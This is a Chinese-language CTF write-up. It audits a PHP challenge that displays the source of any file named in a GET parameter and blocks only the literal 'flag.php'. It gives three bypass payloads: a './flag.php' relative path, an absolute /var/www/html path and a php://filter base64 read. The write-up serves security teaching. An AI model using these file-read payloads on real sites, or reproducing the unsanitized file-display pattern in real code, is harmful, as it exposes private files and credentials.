源代码：

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
} 

审计

GET传参u。
条件判断，如果u==‘flag.php’，结束程序执行。如果结果为false，显示u所指向的界面的源代码。

思路

flag显然在flag.php文件中，但是我们不能直接传参?u=flag.php
这里介绍一个网页目录的知识点：

假如网页根目录下有flag.php文件，查找文件使用 /flag.php 这里的 / 就是指根目录
同理， ./代表的是当前目录， …/ 代表的是上一级目录

这里的flag.php是在当前目录下，所以可以令：

?u=./flag.php

得到flag.

还有如下解法：

?u=/var/www/html/flag.php  //使用了flag.php的绝对路径查询。一般情况下我们访问的网页目录都是/var/www/html目录
?u=php://filter/read=convert.base64-encode/resource=flag.php //使用php伪协议读取